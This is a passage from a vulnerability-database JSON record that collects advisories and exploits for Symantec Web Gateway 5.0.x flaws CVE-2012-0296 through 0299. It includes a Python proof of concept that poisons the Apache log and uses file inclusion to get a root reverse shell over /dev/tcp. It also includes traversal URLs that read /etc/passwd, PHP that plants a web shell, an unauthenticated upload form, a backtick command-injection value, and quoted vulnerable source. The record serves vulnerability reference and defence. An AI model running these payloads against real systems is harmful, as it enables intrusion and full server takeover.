"https://packetstormsecurity.com/files/download/113485/symantec_web_gateway_exec.rb.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:20:43", "description": "", "cvss3": {}, "published": "2012-05-26T00:00:00", "type": "packetstorm", "title": "Symantec Web Gateway 5.0.2 Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2012-0297"], "modified": "2012-05-26T00:00:00", "id": "PACKETSTORM:113050", "href": "https://packetstormsecurity.com/files/113050/Symantec-Web-Gateway-5.0.2-Local-File-Inclusion.html", "sourceData": "`#!/usr/bin/python \n \n# Symantec Web Gateway 5.0.2 Remote LFI root Exploit Proof of Concept \n# Exploit requires no authentication, /tmp/networkScript is sudoable and apache writable. \n# muts at offensive-security dot com \n \n \nimport socket \nimport base64 \n \npayload= '''echo '#!/bin/bash' > /tmp/networkScript; echo 'bash -i >& /dev/tcp/172.16.164.1/1234 0>&1' >> /tmp/networkScript;chmod 755 /tmp/networkScript; sudo /tmp/networkScript''' \npayloadencoded=base64.encodestring(payload).replace(\"\\n\",\"\") \ntaint=\"GET /<?php shell_exec(base64_decode('%s'));?> HTTP/1.1\\r\\n\\r\\n\" % payloadencoded \n \nexpl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) \nexpl.connect((\"172.16.164.129\", 80)) \nexpl.send(taint) \nexpl.close() \n \ntrigger=\"GET /spywall/releasenotes.php?relfile=../../../../../usr/local/apache2/logs/access_log HTTP/1.0\\r\\n\\r\\n\" \nexpl = socket.socket ( socket.AF_INET, socket.SOCK_STREAM ) \nexpl.connect((\"172.16.164.129\", 80)) \nexpl.send(trigger) \nexpl.close() \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/113050/symantecwg-lfi.txt", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2023-12-03T16:43:29", "description": "", "cvss3": {}, "published": "2012-06-27T00:00:00", "type": "exploitdb", "title": "symantec Web gateway 5.0.2.8 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["2012-0297", "2012-0298", "CVE-2012-0297", "CVE-2012-0298"], "modified": "2012-06-27T00:00:00", "id": "EDB-ID:19406", "href": "https://www.exploit-db.com/exploits/19406", "sourceData": "Software: Symantec Web Gateway\r\nCurrent Software Version: 5.0.2.8\r\nProduct homepage: www.symantec.com\r\nAuthor: S2 Crew [Hungary]\r\nCVE: CVE-2012-0297, CVE-2012-0298, ???\r\n\r\nFile include:\r\n https://192.168.82.207/spywall/previewProxyError.php?err=../../../../../../../../etc/passwd\r\n\r\nFile include and OS command execution:\r\n http://192.168.82.207/spywall/releasenotes.php?relfile=../../../../../../etc/passwd\r\n You can execute OS commands just include the error_log:\r\n /usr/local/apache2/logs/\r\n -rw-r--r-- 1 root root 5925 Nov 15 07:25 access_log\r\n -rw-r--r-- 1 root root 3460 Nov 15 07:21 error_log\r\n\r\n Make a connection to port 80:\r\n <?php\r\n $f = fopen('/var/www/html/spywall/cleaner/cmd.php','w');\r\n $cmd = \"<?php system(\\$_GET['cmd']); ?>\";\r\n fputs($f,$cmd);\r\n fclose($f);\r\n\t\tprint \"Shell creation done<br>\";\r\n ?>\r\n\r\nArbitary file download and delete:\r\n https://192.168.82.207/spywall/download_file.php?d=/tmp/addroutelog&name=addroutelog\r\n\td parameter: the complete filename \r\n After the download process application removes the original file with root access! :)\r\n\r\n Command execution methods:\r\n 1.Method\r\n Download and delete the /var/www/html/ciu/.htaccess file.\r\n After it you can access the ciu interface on web.\r\n There is an upload script: /ciu/uploadFile.php\r\n\tUser can control the filename and the upload location:\r\n $_FILES['uploadFile'];\r\n $_POST['uploadLocation'];\r\n\r\n 2.Method\r\n <form action=\"https://192.168.82.192/ciu/remoteRepairs.php\" method=\"POST\" enctype=\"multipart/form-data\">\r\n <input type=\"file\" name=\"uploadFile\">\r\n <input type=\"text\" name=\"action\" value=\"upload\">\r\n <input type=\"text\" name=\"uploadLocation\" value=\"/var/www/html/spywall/cleaner/\">\r\n <input type=\"hidden\" name=\"configuration\" value=\"test\">\r\n <input type=\"submit\" value=\"upload!\">\r\n </form>\r\n\t\r\n\tThe \"/var/www/html/spywall/cleaner\" is writeable by www-data.\r\n\r\nCommand execution after authentication:\r\n\r\n http://192.168.82.207/spywall/adminConfig.php (this is deprecated config file, it should be remove)\r\n\r\n From the modified POST message:\r\n Content-Disposition: form-data; name=\"pingaddress\"\r\n 127.0.0.1`whoami>/tmp/1234.txt`", "sourceHref": "https://www.exploit-db.com/raw/19406", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "prion": [{"lastseen": "2023-11-22T04:33:10", "description": "The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to (1) read or (2) delete arbitrary files via unspecified vectors.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "prion", "title": "Design/Logic Flaw", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0298"], "modified": "2017-12-05T02:29:00", "id": "PRION:CVE-2012-0298", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2012-0298", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}}, {"lastseen": "2023-11-22T04:33:08", "description": "The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to upload arbitrary code to a designated pathname, and possibly execute this code, via unspecified vectors.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0299"], "modified": "2017-12-05T02:29:00", "id": "PRION:CVE-2012-0299", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2012-0299", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T04:33:09", "description": "The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "prion", "title": "Code injection", "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2017-12-05T02:29:00", "id": "PRION:CVE-2012-0297", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2012-0297", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-11-22T04:33:09", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "prion", "title": "Cross site scripting", "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0296"], "modified": "2012-05-22T16:37:00", "id": "PRION:CVE-2012-0296", "href": "https://www.prio-n.com/kb/vulnerability/CVE-2012-0296", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "zdi": [{"lastseen": "2023-12-03T17:03:53", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec Web Gateway. Authentication is not required to exploit this vulnerability. The specific flaw exists because Symantec Web Gateway allows unauthenticated users to upload a file while preserving the file extension. This allows users to upload additional script files that can be used to execute remote code from user supplied commands under the context of the webserver.", "cvss3": {}, "published": "2012-06-08T00:00:00", "type": "zdi", "title": "Symantec Web Gateway upload_file Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0299"], "modified": "2012-06-08T00:00:00", "id": "ZDI-12-091", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-091/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:03:54", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Symantec Web Gateway. Authentication is not required to exploit this vulnerability. The specific flaw exists due to insufficiently filtered user-supplied data used in a call to exec() in multiple script pages. The affected scripts are located in '/spywall/ipchange.php' and 'network.php'. There is also a flaw in '/spywall/download_file.php' that allows unauthenticated users to download and delete any file on the server.", "cvss3": {}, "published": "2012-06-08T00:00:00", "type": "zdi", "title": "Symantec Web Gateway Shell Command Injection Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2012-06-08T00:00:00", "id": "ZDI-12-090", "href": "https://www.zerodayinitiative.com/advisories/ZDI-12-090/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2022-11-28T07:11:53", "description": "An arbitrary code execution vulnerability has been reported in the management GUI in Symantec Web Gateway.", "cvss3": {}, "published": "2012-11-25T00:00:00", "type": "checkpoint_advisories", "title": "Symantec Web Gateway 5.0.2.8 Arbitrary PHP File Upload (CVE-2012-0299)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0299"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-824", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-28T07:12:38", "description": "A remote command execution vulnerability has been reported in Symantec Web Gateway. The vulnerability is due to improper input validation by the web server. A remote attacker can exploit this issue by sending a specially crafted HTTP request to the affected server. Successful exploitation could result in attacker-controlled PHP script or shell command execution in the context of the target server.", "cvss3": {}, "published": "2012-07-16T00:00:00", "type": "checkpoint_advisories", "title": "Symantec Web Gateway Management Console Remote Shell Command Execution (CVE-2012-0297)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2016-09-26T00:00:00", "id": "CPAI-2012-311", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-11-28T07:09:11", "description": "Multiple cross-site scripting vulnerabilities have been reported in Symantec Web Gateway.", "cvss3": {}, "published": "2012-07-02T00:00:00", "type": "checkpoint_advisories", "title": "Symantec Web Gateway timer.php Multiple Reflected Cross-site Scripting (CVE-2012-0296)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2012-0296"], "modified": "2022-11-27T00:00:00", "id": "CPAI-2012-293", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "cve": [{"lastseen": "2023-12-03T15:05:29", "description": "The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to upload arbitrary code to a designated pathname, and possibly execute this code, via unspecified vectors.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "cve", "title": "CVE-2012-0299", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0299"], "modified": "2017-12-05T02:29:00", "cpe": ["cpe:/a:symantec:web_gateway:5.0", "cpe:/a:symantec:web_gateway:5.0.1", "cpe:/a:symantec:web_gateway:5.0.2"], "id": "CVE-2012-0299", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0299", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:symantec:web_gateway:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T15:05:29", "description": "The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to (1) read or (2) delete arbitrary files via unspecified vectors.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "cve", "title": "CVE-2012-0298", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0298"], "modified": "2017-12-05T02:29:00", "cpe": ["cpe:/a:symantec:web_gateway:5.0", "cpe:/a:symantec:web_gateway:5.0.1", "cpe:/a:symantec:web_gateway:5.0.2"], "id": "CVE-2012-0298", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0298", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:P"}, "cpe23": ["cpe:2.3:a:symantec:web_gateway:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T15:05:27", "description": "The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "cve", "title": "CVE-2012-0297", "cwe": ["CWE-264"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0297"], "modified": "2017-12-05T02:29:00", "cpe": ["cpe:/a:symantec:web_gateway:5.0", "cpe:/a:symantec:web_gateway:5.0.1", "cpe:/a:symantec:web_gateway:5.0.2"], "id": "CVE-2012-0297", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0297", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:symantec:web_gateway:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-03T15:05:26", "description": "Multiple cross-site scripting (XSS) vulnerabilities in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.", "cvss3": {}, "published": "2012-05-21T20:55:00", "type": "cve", "title": "CVE-2012-0296", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0296"], "modified": "2012-05-22T16:37:00", "cpe": ["cpe:/a:symantec:web_gateway:5.0", "cpe:/a:symantec:web_gateway:5.0.1", "cpe:/a:symantec:web_gateway:5.0.2"], "id": "CVE-2012-0296", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-0296", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:a:symantec:web_gateway:5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:symantec:web_gateway:5.0.1:*:*:*:*:*:*:*"]}], "attackerkb": [{"lastseen": "2021-07-20T20:13:27", "description": "The file-management scripts in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to upload arbitrary code to a designated pathname, and possibly execute this code, via unspecified vectors.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\nThis vulnerability allows remote attackers to execute arbitrary code on vulnerable installations \nof Symantec Web Gateway. Authentication is not required to exploit this vulnerability.\n\nThe specific flaw exists because Symantec Web Gateway allows unauthenticated users to upload a file \nwhile preserving the file extension. This allows users to upload additional script files that can \nbe used to execute remote code from user supplied commands under the context of the webserver.\n\n## Details\n\n**blocked_file**\n \n \n <?php\n \tinclude_once(\"config/conf.php\");\n \tinclude_once(\"config/db.php\");\n \tinclude_once(\"includes/util_functions.php\");\n \n \n \tif (isset($_POST['submitted']))\n \t{\n \t\t$updated = true;\n \t\tunescape_form_vals(); // remove slashes form values\tas we are displaying only\n \n \t\t$new_image = $_FILES['new_image'];\n \t\t$before_filename = $_POST['before_filename'];\n \t\t$after_filename = $_POST['after_filename'];\n \n \t\t$image_query = \"select value from mi5_blockpagemsg where name='image_name'\";\n \t\t$image_result = @mysql_query($image_query);\n \t\t$image_row = @mysql_fetch_assoc($image_result);\n \t\t$old_image_name = $image_row['value'];\n \t\t@mysql_free_result($image_result);\n \t\t$image_name = $old_image_name;\n \t\t$image_url = $upload_image_url . \"/\". $image_name;\n \n \t\tif ($new_image['error'] == UPLOAD_ERR_OK && $new_image['size'] > 0) // file is uploaded\n \t\t{\n \t\t\t$return_arr = upload_file($new_image, $upload_image_path_temp, \"temp\");\n \t\t\tif ($return_arr['uploaded'])\n \t\t\t{\n \t\t\t\t$image_name = $return_arr['new_file_name'];\n \t\t\t\t$image_url = $upload_image_url_temp . \"/\". $image_name;\n \t\t\t}\n \t\t}\n \t}\n \n ?>\n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <title>Blocked File Download</title>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />\n <link rel=\"stylesheet\" href=\"styles/mi5.css\" />\n </head>\n \n <body>\n <div id=\"mainContent\">\n \n <div id=\"mainText\">\n <?php\n \n \t\t\t\tif ($image_name == '')\n \t\t\t\t{\n \t\t\t\t\t$image_url = \"images/mi5.gif\";\n \t\t\t\t}\n \n \t\t\t?>\n <img src=\"<?php echo $image_url . \"?t=\".time(); ?>\" alt=\"Symantec Defense Centre\" style=\"border: 1px solid #ddd;\" /> <hr noshade=\"noshade\" size=\"1\" style=\"margin-bottom: 10px;\" />\n <table><tr>\n \n <td style=\"padding-left: 15px; border-left: 1px solid #999;\">\n <h3>Symantec Enterprise Spygate</h3>\n <h1>Downloading this file is prohibited</h1>\n <p><?php echo $before_filename; ?> %%File%%<?php echo $after_filename; ?></p>\n \n <p>If you think this spyware detection was in error, please click here.</p>\n \n </td></tr></table>\n \n </div>\n <div class=\"copyright\">© Copyright 2004-2006, Symantec</div>\n </div>\n \n \n </body>\n </html>\n \n\n**blocked_url**\n \n \n <?php\n \tinclude_once(\"config/conf.php\");\n \tinclude_once(\"config/db.php\");\n \tinclude_once(\"includes/util_functions.php\");\n \n \n \tif (isset($_POST['submitted']))\n \t{\n \t\t$updated = true;\n \t\tunescape_form_vals(); // remove slashes form values\tas we are displaying only\n \n \t\t$new_image = $_FILES['new_image'];\n \t\t$before_url = $_POST['before_url'];\n \t\t$after_url = $_POST['after_url'];\n \n \t\t$image_query = \"select value from mi5_blockpagemsg where name='image_name'\";\n \t\t$image_result = @mysql_query($image_query);\n \t\t$image_row = @mysql_fetch_assoc($image_result);\n \t\t$old_image_name = $image_row['value'];\n \t\t@mysql_free_result($image_result);\n \t\t$image_name = $old_image_name;\n \t\t$image_url = $upload_image_url . \"/\". $image_name;\n \n \t\tif ($new_image['error'] == UPLOAD_ERR_OK && $new_image['size'] > 0) // file is uploaded\n \t\t{\n \t\t\t$return_arr = upload_file($new_image, $upload_image_path_temp, \"temp\");\n \t\t\tif ($return_arr['uploaded'])\n \t\t\t{\n \t\t\t\t$image_name = $return_arr['new_file_name'];\n \t\t\t\t$image_url = $upload_image_url_temp . \"/\". $image_name;\n \t\t\t}\n \t\t}\n \t}\n \n ?>\n \n <!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\n <html xmlns=\"http://www.w3.org/1999/xhtml\">\n <head>\n <title>Blocked URL</title>\n <meta http-equiv=\"Content-Type\" content=\"text/html; charset=iso-8859-1\" />\n <link rel=\"stylesheet\" href=\"styles/mi5.css\" />\n </head>\n \n <body>\n <div id=\"mainContent\">\n \n <div id=\"mainText\">\n <?php\t\t\t\tif ($image_name == '')\n \t\t\t\t{\n \t\t\t\t\t$image_url = \"images/mi5.gif\";\n \t\t\t\t}\n \n \t\t\t?>\n <img src=\"<?php echo $image_url . \"?t=\".time(); ?>\" alt=\"Symantec Defense Centre\" style=\"border: 1px solid #ddd;\" /> <hr noshade=\"noshade\" size=\"1\" style=\"margin-bottom: 10px;\" />\n <table><tr>\n \n <td style=\"padding-left: 15px; border-left: 1px solid #999;\">\n <h3>Symantec Enterprise Spygate</h3>\n <h1>Accessing web pages from this URL is prohibited</h1>\n <p><?php echo $before_url; ?> %%URL%%<?php echo $after_url; ?></p>\n \n <p>If you think this spyware detection was in error, please click here.</p>\n \n </td></tr></table>\n \n </div>\n <div class=\"copyright\">© Copyright 2004-2006, Symantec</div>\n </div>\n \n \n </body>\n </html>\n \n\nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "edition": 2, "cvss3": {}, "published": "2012-05-21T00:00:00", "type": "attackerkb", "title": "Symantec Web Gateway upload_file Remote Code Execution Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-0299"], "modified": "2020-02-13T00:00:00", "id": "AKB:E371A741-0446-47E4-97E5-21715E5EA84A", "href": "https://attackerkb.com/topics/W0hUuAVM1c/symantec-web-gateway-upload-file-remote-code-execution-vulnerability", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-20T20:13:31", "description": "The management GUI in Symantec Web Gateway 5.0.x before 5.0.3 does not properly restrict access to application scripts, which allows remote attackers to execute arbitrary code by (1) injecting crafted data or (2) including crafted data.\n\n \n**Recent assessments:** \n \n**wchen-r7** at September 12, 2019 6:07pm UTC reported:\n\n\u2014\\\u201d >> logging\u201d); \nexec(\u201cecho \\\u201croute >> logging\\\u201d >> networkScript\u201d); \necho \u201cexecuting script`<br/>`\u201d; \nexec(\u201c./networkScript\u201d); \n?> \n`</body>` \n`</html>`\n \n \n Analysis of the command injection\n \n \n\necho \u201cifconfig eth0 netmask \u201c. \\\$HTTP_POST_VARS[\"subnet\"] .\" \". \\\$HTTP_POST_VARS[\u201cip\u201d] .\u201c;\u201d >> networkScript\n \n \n \n\n\u201c;\u201d + payload.encoded + \u201c;#\u201d\n \n \n **/spywall/network.php**\n \n ```php\n <?php\n \n require_once('includes/spywall_api.php');\n /*\n $wan = 'eth0';\n $lan = 'eth1';\n $management = 'eth2';\n $mon = 'eth3';\n $savename = '';\n \n $model = exec('cat /tmp/appliancemodel');\n if ($model == '007' || $model == '009') {\n \t// different ethernet device numbers for these models\n \t$management = 'eth0';\n \t$mon = 'eth3';\n \t$wan = 'eth5';\n \t$lan = 'eth6';\n }\n */\n $portMap = getPortMap();\n $management = $portMap['mgmt'];\n $mon = $portMap['monitor'];\n $wan = $portMap['wan'];\n $lan = $portMap['lan'];\n \n $device = '';\n if ($_POST['name'] == 'lan') {\n \t$device = $lan;\n \t$savename = 'LAN';\n } else if ($_POST['name'] == 'wan') {\n \t$device = $wan;\n \t$savename = 'WAN';\n } else if ($_POST['name'] == 'monitor') {\n \t$device = $mon;\n \t$savename = 'MON';\n } else {\n \t$device = $management;\n \t$savename = 'MAN';\n }\n \n if (strlen($device)) {\n \t// set autonegotiation, duplex (if it isn't set to unknown),\n \t// and speed (if it isn't set to unknown)\n \texec(\"sudo /sbin/ethtool -s $device autoneg \". $_POST['auto'] .((isset($_POST['duplex']) && $_POST['duplex'] != 'unknown')?(\" duplex \". $_POST['duplex']):'') 